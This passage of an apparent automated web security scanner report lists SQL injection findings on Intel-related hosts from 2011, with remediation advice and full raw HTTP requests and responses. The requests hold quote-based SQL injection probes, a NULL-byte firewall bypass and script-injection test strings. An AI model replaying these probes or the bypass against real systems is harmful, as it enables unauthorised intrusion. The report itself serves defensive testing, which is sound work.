23.45. http://www.intel.com/technology/turboboost/index.htm

23.46. http://www.intel.com/xmlns/lop

23.47. http://www.json.org/js.html

23.48. http://www.mobileworldcongress.com/

23.49. http://www.youtube.com/ep.swf

24. Content type incorrectly stated

24.1. http://6418dc.r.axf8.net/mr/a.gif

24.2. http://ad.com/

24.3. http://gdata.youtube.com/feeds/api/playlists/698CFFD6A87A1ACB/batch

24.4. http://itcenter.intel.com/sites/sitewide/survey/onsitegeo.js

24.5. http://newsroom.intel.com/favicon.ico

24.6. http://newsroom.intel.com/opensearch.xml

24.7. http://newsroom.intel.com/themes/iprtheme/images/intel-logo.gif

24.8. http://newsroom.intel.com/view-video-short.jspa

24.9. http://onsite2.researchintel.com/engine/icorescript.asp

24.10. http://www.facebook.com/extern/login_status.php

24.11. http://www.freedownloadscenter.com/favicon.ico

24.12. http://www.google.com/buzz/api/button.js

24.13. http://www.intc.com/common/download/download.cfm

24.14. http://www.intc.com/common/mobile/

24.15. http://www.intc.com/releasedetail.cfm

24.16. http://www.intel.com/Assets/en_US/Image/marquees/bg-top-support.png

24.17. http://www.intel.com/Assets/en_US/Image/spotlight/biz-itc-tab.jpg

24.18. http://www.intel.com/sites/sitewide/hat/40recode/js/json.js

24.19. http://www.intel.com/sites/sitewide/survey/onsitegeo.js

24.20. http://www.intel.com/sitewide/js/portal-footer-merged-min.js

24.21. http://www.mobileworldcongress.com/

24.22. http://www.w3.org/1999/XSL/Transform

24.23. http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd

25. Content type is not specified



1. SQL injection  next
There are 4 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://6418dc.r.axf8.net/mr/a.gif [a parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://6418dc.r.axf8.net
Path:   /mr/a.gif

Issue detail

The a parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the a parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /mr/a.gif?a=6418DC'&v=1 HTTP/1.1
Host: 6418dc.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://itcenter.intel.com/ResourceLibrary?4b801'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e58a74ceab=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Length: 3028
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 06 Feb 2011 01:55:28 GMT

<html>
<head>
<title>Runtime Error</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family:"Verdana";fon
...[SNIP]...

Request 2

GET /mr/a.gif?a=6418DC''&v=1 HTTP/1.1
Host: 6418dc.r.axf8.net
Proxy-Connection: keep-alive
Referer: http://itcenter.intel.com/ResourceLibrary?4b801'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E7e58a74ceab=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 0
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 06 Feb 2011 01:55:28 GMT


1.2. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www91.intel.com
Path:   /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b%00'/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:14:10 GMT
Server: Omniture DC/2.0.0
Content-Length: 394
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b was not found on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b%00''/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:14:11 GMT
Server: Omniture DC/2.0.0
xserver: www605
Content-Length: 0
Content-Type: text/html


1.3. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www91.intel.com
Path:   /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal%00'/1/H.20.3/s88289088732562?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 1

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:14:37 GMT
Server: Omniture DC/2.0.0
Content-Length: 437
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /b/ss/intelcorp,intelnewscorp,intelnewsglobal was not
...[SNIP]...
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
...[SNIP]...

Request 2

GET /b/ss/intelcorp,intelnewscorp,intelnewsglobal%00''/1/H.20.3/s88289088732562?AQB=1&ndh=1&t=5/1/2011%2019%3A57%3A46%206%20360&ce=UTF-8&pageName=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&g=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business%3Fcid%3Drss-258152-c1-264093&r=http%3A//burp/show/13&cc=USD&ch=corp&v0=rss-258152-c1-264093&events=event5&c1=corp%3Aen_us&h1=corp%7Ccorp%3Aen_us%7Ccorp%3Aen_us%3Anewsroom&c2=corp%3Aen_us%3Anewsroom&v3=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c4=unassigned&v4=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c5=eng&v6=corp%3Aen_us&c7=intelnewscorp%2Cintelnewsglobal&v7=corp%3Aen_us%3Anewsroom&c8=http%3A//newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style%3D%22x%3Aexpression%28alert%281%29%29%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business&c13=Version%204.5.1&c14=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b&c16=Less%20than%201%20day&v16=Less%20than%201%20day&c17=repeat&v17=repeat&c18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dgg_about%2Bintel_pressroom97bc3%25253cscript%25253ealert%281%29%25253&c21=anonymous&v21=anonymous&c25=error&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=985&bh=1012&AQE=1 HTTP/1.1
Host: www91.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/blog/2011/0176c51%22style=%22x:expression(alert(1))%22f5ad9d5bc7f/31/intel-completes-acquisition-of-infineon-s-wireless-solutions-business?cid=rss-258152-c1-264093
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; JSESSIONID=5E01E36EFE93C49336779F5E81214FBA.node6IPR; s_sq=intelcorpitcenter%2Cintelcorpcim%2Cintelcorpbus%2Cintelitcenterenus%3D%2526pid%253Dcim%25253Aitcenter%25253Aen_us%25253Alibrary%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/p/en_US/support%25253Fiid%25253Dhdr%25252Bsupport%2526ot%253DA; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel,http%3A//www.intel.com/about/corporateresponsibility/index.htm%3Fiid%3Dsubhdr+cr:Intel%20Corporate%20Responsibility%20-%20With%20Leadership%20Comes%20Responsibility,http%3A//itcenter.intel.com/ResourceLibrary%3F4b801%27%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E7e58a74ceab%3D1:%0A%09%0AIT%20Center%20Resource%20Library%0A%0A,http%3A//www.intel.com/p/en_US/support%3Fiid%3Dhdr+support:Intel%AE%20Product%20Support,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dgg_about+intel_pressroom97bc3%25253Cscript%25253Ealert%281%29%25253C/script%25253E00808251755:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; cmp_cookie=rss-258152-c1-264093; s_lv=1296957466999; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/blog/2011/0176c51%2522style%3D%2522x%3Aexpression%28alert%281%29%29%2522f5ad9d5b

Response 2

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 02:14:37 GMT
Server: Omniture DC/2.0.0
xserver: www616
Content-Length: 0
Content-Type: text/html


1.4. http://www91.intel.com/b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www91.intel.com
Path:   /b/ss/intelcorp,intelnewscorp,intelnewsglobal/1/H.20.3/s88289088732562

Issue detail

